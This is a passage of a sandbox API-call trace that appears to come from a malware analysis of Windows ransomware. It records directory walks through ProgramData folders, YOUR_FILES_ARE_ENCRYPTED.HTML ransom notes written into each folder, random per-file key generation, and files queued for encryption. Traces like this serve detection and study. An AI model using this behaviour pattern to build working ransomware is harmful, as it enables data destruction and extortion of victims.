hFindFile=0x42f3200) returned 1 [0157.364] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 102 [0157.364] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\CacheManager\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\cachemanager\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.365] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.367] CloseHandle (hObject=0x4a8) returned 1 [0157.368] GetProcessHeap () returned 0x270000 [0157.369] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.370] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Service", cAlternateFileName="")) returned 1 [0157.370] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned 67 [0157.370] GetProcessHeap () returned 0x270000 [0157.370] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7400058 [0157.370] lstrcpyW (in: lpString1=0x7400058, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service" [0157.370] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*" [0157.370] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0157.370] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.370] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0157.370] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0157.370] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 97 [0157.370] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\Service\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\service\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0157.371] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0157.374] CloseHandle (hObject=0x4a8) returned 1 [0157.374] GetProcessHeap () returned 0x270000 [0157.375] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0157.375] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5ce740bd, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5ce740bd, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Service", cAlternateFileName="")) returned 0 [0157.375] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0157.375] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0157.375] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\History\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\history\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0157.376] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0157.378] CloseHandle (hObject=0x58c) returned 1 [0157.379] GetProcessHeap () returned 0x270000 [0157.380] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0157.380] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5ce740bd, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x5cf0c63e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cf0c63e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="History", cAlternateFileName="")) returned 0 [0157.380] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.380] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 81 [0157.380] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Scans\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\scans\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.381] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.383] CloseHandle (hObject=0x5a0) returned 1 [0157.384] GetProcessHeap () returned 0x270000 [0157.385] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.385] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5cdb59dc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cdb59dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Support", cAlternateFileName="")) returned 1 [0157.385] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned 53 [0157.385] GetProcessHeap () returned 0x270000 [0157.385] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.385] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support" [0157.385] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*" [0157.385] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5cdb59dc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cdb59dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.387] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log") returned 79 [0157.387] lstrcmpW (lpString1="MPLog-07132009-215552.log", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0157.387] PathFindExtensionW (pszPath="MPLog-07132009-215552.log") returned=".log" [0157.387] lstrlenW (lpString=".log") returned 4 [0157.387] PathFindExtensionW (pszPath="MPLog-07132009-215552.log") returned=".log" [0157.387] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0157.387] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\mplog-07132009-215552.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0157.388] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=6114) returned 1 [0157.388] GetProcessHeap () returned 0x270000 [0157.388] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73f0050 [0157.389] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B1") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="31") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="BA") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="23") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="15") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="EE") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="11") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="94") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="E5") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="8B") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="12") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3E") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="2C") returned 2 [0157.389] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="AB") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="FC") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="51") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D9") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="13") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="35") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="41") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="40") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="36") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="28") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="86") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F5") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="81") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C1") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="CF") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="30") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="FE") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="5F") returned 2 [0157.390] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="23") returned 2 [0157.391] lstrcpyW (in: lpString1=0x7400104, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\MPLog-07132009-215552.log" [0157.391] CreateIoCompletionPort (FileHandle=0x58c, ExistingCompletionPort=0x3a0, CompletionKey=0x73f0050, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0157.391] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73f0050, lpOverlapped=0x73f0050) returned 1 [0157.391] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0157.392] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0157.392] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0157.393] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0157.395] CloseHandle (hObject=0x5a0) returned 1 [0157.396] GetProcessHeap () returned 0x270000 [0157.397] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0157.397] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4e927dd, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x5cdb59dc, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x5cdb59dc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Support", cAlternateFileName="")) returned 0 [0157.397] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0157.397] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0157.397] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows Defender\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\windows defender\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0157.397] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0157.400] CloseHandle (hObject=0x598) returned 1 [0157.400] GetProcessHeap () returned 0x270000 [0157.402] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0157.413] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows NT", cAlternateFileName="WINDOW~2")) returned 1 [0157.413] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned 39 [0157.413] GetProcessHeap () returned 0x270000 [0157.413] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0157.413] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT" [0157.414] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*" [0157.414] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0157.419] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.419] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="MSFax", cAlternateFileName="")) returned 1 [0157.419] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned 45 [0157.419] GetProcessHeap () returned 0x270000 [0157.419] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0157.419] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax" [0157.419] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*" [0157.419] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0157.421] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x917f121e, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x917f121e, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0157.421] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ActivityLog", cAlternateFileName="ACTIVI~1")) returned 1 [0157.421] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned 57 [0157.421] GetProcessHeap () returned 0x270000 [0157.421] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0157.421] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog" [0157.421] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*" [0157.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Windows NT\\MSFax\\ActivityLog\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, ftLastWriteTime.dwLowDateTime=0xe4eb893d, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0157.422] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4eb893d, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0xe4eb893d, ftLastAccessTime.dwHighDateTime=0x1ca043e, 